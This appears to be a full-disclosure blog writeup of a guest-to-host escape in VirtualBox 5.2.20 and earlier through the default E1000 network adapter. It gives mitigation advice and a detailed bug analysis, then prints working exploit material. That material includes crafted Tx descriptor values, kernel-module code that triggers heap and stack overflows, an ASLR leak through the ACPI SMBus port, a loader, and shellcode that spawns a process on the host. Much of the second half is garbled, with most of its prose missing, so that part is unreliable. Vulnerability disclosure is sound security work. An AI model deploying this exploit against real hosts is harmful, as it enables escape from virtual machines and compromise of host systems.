I like VirtualBox, and it has nothing to do with the reason I post information about the vulnerability. The reason is disagreement with the current realities in information security, more precisely, in the direction of security research and bug bounty.
The first two points completely exhausted me, so my move is full disclosure.
Vulnerable software: VirtualBox 5.2.20 and earlier.
Host OS: any, the bug is in a common code base.
Guest OS: any.
VM configuration: default (for operation, you only need the Intel PRO / 1000 MT Desktop network card (82540EM), and NAT to be the mode of operation).
Until the patched version of VirtualBox is released, change the settings of your virtual machines to the network card on PCnet (either of the two) or on the Paravirtualized Network. If there is no way to do this, then change the mode of operation with NAT to any other for the Intel adapter. The first option is more reliable.
When creating a new virtual machine, the default network adapter is the Intel PRO / 1000 MT Desktop (82540EM), configured to work in NAT mode. For brevity, we will call it E1000.
The virtual device code E1000 contains a vulnerability that allows an attacker with root / administrator rights in the guest OS to escape to the host OS and execute code in ring 3. Then the attacker can use the already well-known techniques for raising privileges to ring 0 using the VirtualBox / dev / vboxdrv driver .
To send network packets, the guest does the same thing as a regular computer: configures the network adapter and gives it packets, which consist of data link frames and other higher level headers. Packets are not transmitted to the adapter by themselves, but wrapped in Tx-handles (Transmit Descriptor). These data structures, described in the network card specification (317453006EN.PDF, Revision 4.0), store various meta-information, such as packet size or VLAN tag, manage TCP / IP segmentation, etc.
The 82540EM specification provides three types of Tx descriptors: legacy, context, data. Legacy descriptors were relevant, apparently, in the past. The remaining two are used in conjunction. For us, it is only important that context-descriptors set the maximum packet size and enable / disable TCP / IP-segmentation, and the data-descriptors put the addresses of the packages in physical memory and specify their size. The packet size in the data descriptor cannot be larger than specified in the context descriptor. Context descriptors are transferred to the network card, as a rule, before the data descriptors.
To transfer Tx-descriptors to the network adapter, they are recorded in the Tx-ring (Transmit Descriptor Ring). This is a ring buffer located in physical memory at a predefined address. When all the required descriptors are written into the ring, the guest updates the TDT (Transmit Descriptor Tail) register in the MMIO adapter, which signals the host of new descriptors that need to be processed.
We have the following array of Tx-descriptors:
[context_1, data_2, data_3, context_4, data_5]
Suppose that they contain the following information (the names of the fields are specifically made human-readable, but they correspond to the descriptor fields from the 82540EM specification):
context_1.header_length = 0 context_1.maximum_segment_size = 0x3010 context_1.tcp_segmentation_enabled = true data_2.data_length = 0x10 data_2.end_of_packet = false data_2.tcp_segmentation_enabled = true data_3.data_length = 0 data_3.end_of_packet = true data_3.tcp_segmentation_enabled = true context_4.header_length = 0 context_4.maximum_segment_size = 0xF context_4.tcp_segmentation_enabled = true data_5.data_length = 0x4188 data_5.end_of_packet = true data_5.tcp_segmentation_enabled = true
Soon we will figure out why the descriptors should be just such for the operation of the error.
Imagine that the guest wrote down the above descriptors in the Tx-ring in exact order and updated the TDT register. Now the VirtualBox process on the host will execute the e1kXmitPending function, which is located in the src / VBox / Devices / Network / DevE1000.cpp file (most of the comments here and further removed for readability):
static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread) { ... while (!pThis->fLocked && e1kTxDLazyLoad(pThis)) { while (e1kLocateTxPacket(pThis)) { fIncomplete = false; rc = e1kXmitAllocBuf(pThis, pThis->fGSO); if (RT_FAILURE(rc)) goto out; rc = e1kXmitPacket(pThis, fOnWorkerThread); if (RT_FAILURE(rc)) goto out; }
The e1kTxDLazyLoad function counts all 5 Tx descriptors from a Tx-ring. Then e1kLocateTxPacket will be called for the first time. This function bypasses all the descriptors and prepares the state for further work, but does not perform most of the work on the processing of the descriptors. In our case, the first call to e1kLocateTxPacket will handle the context_1, data_2, data_3 descriptors. The two remaining descriptors, context_4 and data_5, will be processed at the next iteration of the while loop (we will look at the second iteration in the next section). This split of the array of descriptors in two leads to important consequences, so let's see why it happens.
The e1kLocateTxPacket function looks like this:
static bool e1kLocateTxPacket(PE1KSTATE pThis) { ... for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i) { E1KTXDESC *pDesc = &pThis->aTxDescriptors[i]; switch (e1kGetDescType(pDesc)) { case E1K_DTYP_CONTEXT: e1kUpdateTxContext(pThis, pDesc); continue; case E1K_DTYP_LEGACY: ... break; case E1K_DTYP_DATA: if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN) break; ... break; default: AssertMsgFailed(("Impossible descriptor type!")); }
The first descriptor (context_1) is E1K_DTYP_CONTEXT, therefore the function e1kUpdateTxContext is called. This function updates the TCP segmentation context if segmentation was requested in the descriptor. This is true for our context_1 descriptor (see previous section), so the TCP segmentation context will be updated (we are not interested in the essence of the "TCP segmentation context update", so we will use this term just to refer to this section of code).
The second descriptor (data_2) is E1K_DTYP_DATA, for it some other actions are performed that have no meaning for us.
The third descriptor (data_3) is E1K_DTYP_DATA, but since data_3.data_length == 0 (pDesc-> data.cmd.u20DTALEN in the code above), no action is taken.
At this point in time, all three descriptors are initially processed, and we have two more unprocessed descriptors. Now the focus: in the above code, after the switch statement, it is checked whether the end_of_packet flag is set in the descriptor. This is true for the data_3 descriptor (data_3.end_of_packet == true), so the code performs some actions and exits the function:
if (pDesc->legacy.cmd.fEOP) { ... return true; }
If the data_3.end_of_packet flag were not set, then the remaining two descriptors would also be initially processed, and this would prevent the vulnerability. Below, you will see why this exit from the function even before traversing all the descriptors leads to a bug.
So, when returning from e1kLocateTxPacket, we have the following descriptors, ready to extract network packets from them and send to the network: context_1, data_2, data_3. Now in the internal while loop of the e1kXmitPending function, e1kXmitPacket is called. This function again bypasses all the descriptors (5 in our case) in order to finally process them:
static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread) { ... while (pThis->iTxDCurrent < pThis->nTxDFetched) { E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent]; ... rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread); ... if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP) break; }
For each descriptor, the e1kXmitDesc function is called:
static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr, bool fOnWorkerThread) { ... switch (e1kGetDescType(pDesc)) { case E1K_DTYP_CONTEXT: ... break; case E1K_DTYP_DATA: { ... if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0) { E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf)); } else { if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg))) { ... } else if (!pDesc->data.cmd.fTSE) { ... } else { STAM_COUNTER_INC(&pThis->StatTxPathFallback); rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread); } } ...
The first descriptor that is passed to e1kXmitDesc is context_1. The function does nothing for context descriptors.
The second handle is data_2. Since we set the tcp_segmentation_enable == true flag for all data descriptors (pDesc-> data.cmd.fTSE in the code above), we call the e1kFallbackAddToFrame function, where an overflow of the integer variable will later occur when processing the data_5 descriptor.
static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread) { ... uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS; /* * Carve out segments. */ int rc = VINF_SUCCESS; do { /* Calculate how many bytes we have left in this TCP segment */ uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen; if (cb > pDesc->data.cmd.u20DTALEN) { /* This descriptor fits completely into current segment */ cb = pDesc->data.cmd.u20DTALEN; rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread); } else { ... } pDesc->data.u64BufAddr += cb; pDesc->data.cmd.u20DTALEN -= cb; } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc)); if (pDesc->data.cmd.fEOP) { ... pThis->u16TxPktLen = 0; ... } return VINF_SUCCESS; }
The most important variables for us are here: u16MaxPktLen, pThis-> u16TxPktLen, pDesc-> data.cmd.u20DTALEN.
Let's draw a table where the values of variables will be indicated before and after the e1kFallbackAddToFrame function is executed for two data descriptors.
Tx handle | Before after | u16MaxPktLen | pThis-> u16TxPktLen | pDesc-> data.cmd.u20DTALEN |
---|---|---|---|---|
data_2 | Before | 0x3010 | 0 | 0x10 |
- | After | 0x3010 | 0x10 | 0 |
data_3 | Before | 0x3010 | 0x10 | 0 |
- | After | 0x3010 | 0x10 | 0 |
For us, the only important thing is that when data_3 is processed, pThis-> u16TxPktLen is 0x10.
And now the most important point. Take another look at the end of the listing for the e1kXmitPacket function:
if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP) break;
Since the data_3 descriptor type is not equal to E1K_DTYP_CONTEXT, and since data_3.end_of_packet == true, we break the loop despite the fact that we also need to handle context_4 and data_5. Again, we have not finished working with descriptors, as is the case with the initial processing. Why is it important? To understand the essence of the vulnerability, you need to understand that all context-descriptors are processed before data-descriptors. Context descriptors are processed during the update of the TCP segmentation context in the e1kLocateTxPacket function. Data descriptors are processed later in the e1kXmitPacket function. The developers have done so in order to prohibit changing the variable u16MaxPktLen, which is controlled by context-descriptors, after several bytes of network packets have been processed. If we could change context descriptors at any time, we could easily achieve an integer overflow in e1kFallbackAddToFrame (the size of the processed data lies in pThis-> u16TxPktLen):
uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
But we can bypass this overflow protection. Recall that back in e1kLocateTxPacket, we forced the function to perform a return due to the fact that data_3.end_of_packet == true. Because of this, we still have two descriptors (context_4 and data_5) awaiting initial and final processing, despite the fact that we have already processed several bytes (pThis-> u16TxPktLen is 0x10, not zero).
So, we have the opportunity to change u16MaxPktLen arbitrarily using context_4.maximum_segment_size in order to achieve an integer overflow.
We have completely processed the first three descriptors and return to the beginning of the internal while loop of the e1kXmitPending function:
while (e1kLocateTxPacket(pThis)) { fIncomplete = false; rc = e1kXmitAllocBuf(pThis, pThis->fGSO); if (RT_FAILURE(rc)) goto out; rc = e1kXmitPacket(pThis, fOnWorkerThread); if (RT_FAILURE(rc)) goto out; }
Here we call e1kLocateTxPacket to perform the initial processing of context_4 and data_5. As mentioned earlier, we can set the value of context_4.maximum_segment_size in an arbitrary way, incl. such that it will be less than the size of the data that we have already processed. Remember our initial data:
context_4.header_length = 0 context_4.maximum_segment_size = 0xF context_4.tcp_segmentation_enabled = true data_5.data_length = 0x4188 data_5.end_of_packet = true data_5.tcp_segmentation_enabled = true
After running e1kLocateTxPacket, we have a maximum network packet size of 0xF, while the size of the already processed data is 0x10.
Finally, during the processing of data_5, the function e1kFallbackAddToFrame is called, where we have the following variable values:
Tx handle | Before after | u16MaxPktLen | pThis-> u16TxPktLen | pDesc-> data.cmd.u20DTALEN |
---|---|---|---|---|
data_5 | Before | 0xF | 0x10 | 0x4188 |
- | After | - | - | - |
As a result, an integer overflow occurs:
uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen; => uint32_t cb = 0xF - 0x10 = 0xFFFFFFFF;
This allows us to successfully perform the following check, because 0xFFFFFFFF> 0x4188:
if (cb > pDesc->data.cmd.u20DTALEN) { cb = pDesc->data.cmd.u20DTALEN; rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread); }
Now the e1kFallbackAddSegment function will be called with a size (cb) of 0x4188. Without a vulnerability, it is impossible to call this function with a size greater than 0x4000, since In the process of updating the TCP segmentation context, it checks that the maximum segment size is less than or equal to 0x4000:
DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc) { ... uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/ if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE)) { pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/ ... }
How can we exploit our ability to call the e1kFallbackAddSegment function with an arbitrary size? I found at least two possibilities. First, the data that the guest sends is copied to the buffer on the heap:
static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread) { ... PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr, pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);
Here, pThis-> aTxPacketFallback is a buffer of size 0x3FA0, and u16Len is 0x4188 - an obvious heap overflow, which can lead, say, to rewriting pointers to functions, objects, or anything else.
Secondly, if we look deeper, we find that e1kFallbackAddSegment calls the e1kTransmitFrame function, which, with a certain configuration of the network adapter registers, calls e1kHandleRxPacket. This function allocates a buffer of size 0x4000 on the stack and copies into it data with the specified size without any checks, since they were performed earlier:
static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status) { #if defined(IN_RING3) uint8_t rxPacket[E1K_MAX_RX_PKT_SIZE]; ... if (status.fVP) { ... } else memcpy(rxPacket, pvBuf, cb);
As you can see, we have converted the integer overflow vulnerability to the classic stack buffer overflow vulnerability. Both of the examples above, heap buffer overflow and stack buffer overflow, are involved in the exploit.
The exploit is the Linux kernel module, which is loaded into the guest OS. For Windows, you need a driver that will be different except as a wrapper for initialization and other nuclear API calls.
Driver loading on both operating systems requires elevated privileges. This is a normal phenomenon and is not considered an insurmountable obstacle. For example, take a look at the Pwn2Own competition, where researchers use exploit chains: the guest OS uses the browser that opened the “malicious” site, escapes from the browser sandbox for full access to the context ring 3, exploits a vulnerability in the operating system to access ring 0 , from where all opportunities for attack on a hypervisor from guest OS open.
Of course, the most powerful vulnerabilities in hypervisors are those that are exploited from ring 3 of a guest. In VirtualBox, too, there is code that is reachable without root privileges, and it is still poorly understood.
The exploit is 100% stable. This means that it either works always, or does not work at all because of inappropriate binaries or something more problematic, which I have not provided for. On guest Ubuntu 16.04 and 18.04 x86_64 with the default configuration, it works.
The driver maps a portion of the physical memory corresponding to the MMIO network card to virtual memory. The physical address and size is set by the hypervisor.
void* map_mmio(void) { off_t pa = 0xF0000000; size_t len = 0x20000; void* va = ioremap(pa, len); if (!va) { printk(KERN_INFO PFX"ioremap failed to map MMIO\n"); return NULL; } return va; }
Then, the configuration of general-purpose registers E1000 is performed, the memory for the Tx-ring is allocated and the transmit-registers are configured.
void e1000_init(void* mmio) { // Configure general purpose registers configure_CTRL(mmio); // Configure TX registers g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL); if (!g_tx_ring) { printk(KERN_INFO PFX"Failed to allocate TX Ring\n"); return; } configure_TDBAL(mmio); configure_TDBAH(mmio); configure_TDLEN(mmio); configure_TCTL(mmio); }
From the beginning of the development of the exploit, I decided to abandon the use of primitives found in the VirtualBox subsystems that are disabled by default. First of all, it refers to the Chromium service (not the browser), which is responsible for 3D acceleration, in which over the past year, researchers have found more than 40 vulnerabilities. Information leak is a leak of information, usually a pointer with respect to some dynamic library, from which you can get its base address and bypass the protection of ASLR.
There was a problem: to find the information leak vulnerability in the components running by default. There was an obvious thought that once our main vulnerability allows us to fill the heap, i.e. belongs to the class heap buffer overflow, we control everything that is outside this buffer. Then we will see that no additional vulnerabilities were needed: our integer underflow was so powerful that it gave read and write primitives, as well as information leak and stack buffer overflow.
Let's see what exactly is overflowing on the heap.
/** * Device state structure. */ struct E1kState_st { ... uint8_t aTxPacketFallback[E1K_MAX_TX_PKT_SIZE]; ... E1kEEPROM eeprom; ... }
Here, aTxPacketFallback is a buffer of size 0x3FA0 that will be filled with data read from the data descriptor. Looking for what interesting fields behind this buffer can be changed, the E1kEEPROM structure came across. Inside it there is another structure with such fields (file src / VBox / Devices / Network / DevE1000.cpp):
/** * 93C46-compatible EEPROM device emulation. */ struct EEPROM93C46 { ... bool m_fWriteEnabled; uint8_t Alignment1; uint16_t m_u16Word; uint16_t m_u16Mask; uint16_t m_u16Addr; uint32_t m_u32InternalWires; ... }
What can we give them a modification? In the E1000 code, work with the EEPROM - the permanent memory of the network adapter is implemented. The guest OS can access it using certain E1000 MMIO registers. Work with EEPROM is implemented as a finite state machine, which has several states and performs four actions. We will be interested only in the "write to memory" action. Here’s what it looks like (src / VBox / Devices / Network / DevEEPROM.cpp file):
EEPROM93C46::State EEPROM93C46::opWrite() { storeWord(m_u16Addr, m_u16Word); return WAITING_CS_FALL; } void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value) { if (m_fWriteEnabled) { E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr)); m_au16Data[u32Addr] = u16Value; } m_u16Mask = DATA_MSB; }
Here, m_u16Addr, m_u16Word and m_fWriteEnabled are the values of the fields in the EEPROM93C46 structure, which we completely control. Therefore, you can set them in such a way that
m_au16Data[u32Addr] = u16Value;
two bytes will be written at an arbitrary 16-bit offset from the m_au16Data array, which is located in the same structure. We found a write primitive.
The next task was to search for data structures on the heap that would make sense to write arbitrary data, not forgetting that the main goal is to merge the pointer relative to some module in order to get its base address. Fortunately, it was not necessary to resort to unstable filling of the heap (heap spray), since it turned out that the basic data structures for virtual devices are separated from the internal hypervisor heap in such a way that each time VirtualBox starts, the distance between these heap blocks is the same despite the fact that the virtual block addresses each time start, of course, differ due to ASLR.
Specifically, when VirtualBox is launched, the PDM (Pluggable Device and Driver Manager) subsystem for each device creates a PDMDEVINS object, which is allocated from the hypervisor heap.
int pdmR3DevInit(PVM pVM) { ... PPDMDEVINS pDevIns; if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0)) rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns); else rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns); ...
I drove this section of code under the GDB debugger using a script and got something like this:
[trace-device-constructors] Constructing a device #0x0: [trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times> [trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device" [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)> [trace-device-constructors] Instance: 0x7fc45486c1b0 [trace-device-constructors] Data size: 0x8 [trace-device-constructors] Constructing a device #0x1: [trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times> [trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device" [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)> [trace-device-constructors] Instance: 0x7fc45486c720 [trace-device-constructors] Data size: 0x11e8 ... [trace-device-constructors] Constructing a device #0xe: [trace-device-constructors] Name: "e1000", '\000' <repeats 26 times> [trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n" [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)> [trace-device-constructors] Instance: 0x7fc470083400 [trace-device-constructors] Data size: 0x53a0 [trace-device-constructors] Constructing a device #0xf: [trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times> [trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller" [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)> [trace-device-constructors] Instance: 0x7fc470088b00 [trace-device-constructors] Data size: 0x1848 [trace-device-constructors] Constructing a device #0x10: [trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times> [trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n" [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)> [trace-device-constructors] Instance: 0x7fc47008a4e0 [trace-device-constructors] Data size: 0x1728 [trace-device-constructors] Constructing a device #0x11: [trace-device-constructors] Name: "acpi", '\000' <repeats 27 times> [trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface" [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)> [trace-device-constructors] Instance: 0x7fc47008be70 [trace-device-constructors] Data size: 0x1570 [trace-device-constructors] Constructing a device #0x12: [trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times> [trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device" [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)> [trace-device-constructors] Instance: 0x7fc47008dba0 [trace-device-constructors] Data size: 0x90 [trace-device-constructors] Instances: [trace-device-constructors] #0x0 Address: 0x7fc45486c1b0 [trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570 [trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0 [trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0 [trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00 [trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380 [trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0 [trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430 [trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0 [trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0 [trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0 [trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070 [trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080 [trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170 [trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310 [trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700 [trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0 [trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990 [trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30
0xE, E1000. , E1000 0x5700 , — 0x19E0 .. , , .
E1000 : ICH IC'97, OHCI, ACPI, VirtualBox GIM. , , write-.
ACPI ( src/VBox/Devices/PC/DevACPI.cpp):
typedef struct ACPIState { ... uint8_t au8SMBusBlkDat[32]; uint8_t u8SMBusBlkIdx; uint32_t uPmTimeOld; uint32_t uPmTimeA; uint32_t uPmTimeB; uint32_t Alignment5; } ACPIState;
/ 0x4100-0x410F. 0x4107 :
PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb) { RT_NOREF1(pDevIns); ACPIState *pThis = (ACPIState *)pvUser; ... switch (off) { ... case SMBBLKDAT_OFF: *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx]; pThis->u8SMBusBlkIdx++; pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1; break; ...
INB 0x4107 , au8SMBusBlkDat[32] u8SMBusBlkIdx . - write-: , EEPROM93C46.m_au16Data ACPIState.u8SMBusBlkIdx . ACPIState.u8SMBusBlkIdx, 255 ACPIState.au8SMBusBlkDat.
. ACPIState, , , u8SMBusBlkIdx , . , ACPIState , . , , , .
gef➤ x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1 0x7fc47008d4e0: 0xffffe98100000090 0xfffd9b2000000000 0x7fc47008d4f0: 0x00007fc470067a00 0x00007fc470067a00 0x7fc47008d500: 0x00000000a0028a00 0x00000000000e0000 0x7fc47008d510: 0x00000000000e0fff 0x0000000000001000 0x7fc47008d520: 0x000000ff00000002 0x0000100000000000 0x7fc47008d530: 0x00007fc47008c358 0x00007fc44d6ecdc6 0x7fc47008d540: 0x0031000035944000 0x00000000000002b8 0x7fc47008d550: 0x00280001d3878000 0x0000000000000000 gef➤ x/s 0x00007fc44d6ecdc6 0x7fc44d6ecdc6: "ACPI RSDP" gef➤ vmmap VBoxDD.so Start End Offset Perm Path 0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 rx /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so 0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so 0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so 0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so gef➤ p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000 $2 = 0x1f9dc6
, 0x58 ACPIState , RVA VBoxDD.so. , VBoxDD.so ASLR. , , , ACPIState . , , 0x58 ACPIState .
ASLR. , EEPROM93C46, EEPROM ACPIState, INB(0x4107) ACPI . , .
uint64_t stage_1_main(void* mmio, void* tx_ring) { printk(KERN_INFO PFX"##### Stage 1 #####\n"); // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor // is sent back to the guest and handled right now via e1kHandleRxPacket. // When loopback mode is disabled data is sent to a network as usual. // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and // the stack buffer. e1000_disable_loopback_mode(mmio); uint8_t leaked_bytes[8]; uint32_t i; for (i = 0; i < 8; i++) { stage_1_overflow_heap_buffer(mmio, tx_ring, i); leaked_bytes[i] = stage_1_leak_byte(); printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]); } uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes; uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA; printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr); printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base); return vboxdd_base; }
, , integer underflow stack buffer overflow, E1000. , e1kHandleRxPacket, Tx- , loopback-. : , . , e1kHandleRxPacket .
ASLR. loopback- stack buffer overflow.
void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) { off_t buffer_pa; void* buffer_va; alloc_buffer(&buffer_pa, &buffer_va); stage_2_set_up_buffer(buffer_va, vboxdd_base); stage_2_trigger_overflow(mmio, tx_ring, buffer_pa); free_buffer(buffer_va); } void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) { printk(KERN_INFO PFX"##### Stage 2 #####\n"); e1000_enable_loopback_mode(mmio); stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base); e1000_disable_loopback_mode(mmio); }
, e1kHandleRxPacket, , , . DEP . ROP-, , .
. , , . ROP-, — .
use64 start: lea rsi, [rsp - 0x4170]; push rax pop rdi add rdi, loader_size mov rcx, 0x800 rep movsb nop payload: ; Here the shellcode is to be loader_size = $ - start
. :
use64 start: ; sys_fork mov rax, 58 syscall test rax, rax jnz continue_process_execution ; Initialize argv lea rsi, [cmd] mov [argv], rsi ; Initialize envp lea rsi, [env] mov [envp], rsi ; sys_execve lea rdi, [cmd] lea rsi, [argv] lea rdx, [envp] mov rax, 59 syscall ... cmd db '/usr/bin/xterm', 0 env db 'DISPLAY=:0.0', 0 argv dq 0, 0 envp dq 0, 0
fork execve, /usr/bin/xtem. ring 3.
, . , , , . , , .
continue_process_execution: ; Restore RBP mov rbp, rsp add rbp, 0x48 ; Skip junk add rsp, 0x10 ; Restore the registers that must be preserved according to System V ABI pop rbx pop r12 pop r13 pop r14 pop r15 ; Skip junk add rsp, 0x8 ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown ; Before: "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL ; After: "E1000-Xmit" -> NULL ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv" ; This was unnecessary on my testing machines but to be sure... mov rdi, [rbx] mov rax, 0x0 mov rcx, 0xA0 rep stosb ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit" ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1") ; will be corrupted in MMHyperFree mov qword [rbx], 0x0 ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted ret
, , e1kHandleRxPacket. , , ROP-, , : , .
e1kHandleRxPacket :
#0 e1kHandleRxPacket #1 e1kTransmitFrame #2 e1kXmitDesc #3 e1kXmitPacket #4 e1kXmitPending #5 e1kR3NetworkDown_XmitPending ...
e1kR3NetworkDown_XmitPending, :
static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface) { PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown); /* Resume suspended transmission */ STATUS &= ~STATUS_TXOFF; e1kXmitPending(pThis, true /*fOnWorkerThread*/); }
0x48 RBP, , e1kR3NetworkDown_XmitPending. RBX, R12, R13, R14 R15, .. System V ABI . , - .
— . , access violation PDMR3QueueDestroyDevice. , PDMQUEUE, ROP-, .. 16 . ROP-, . , .
, — . , . :
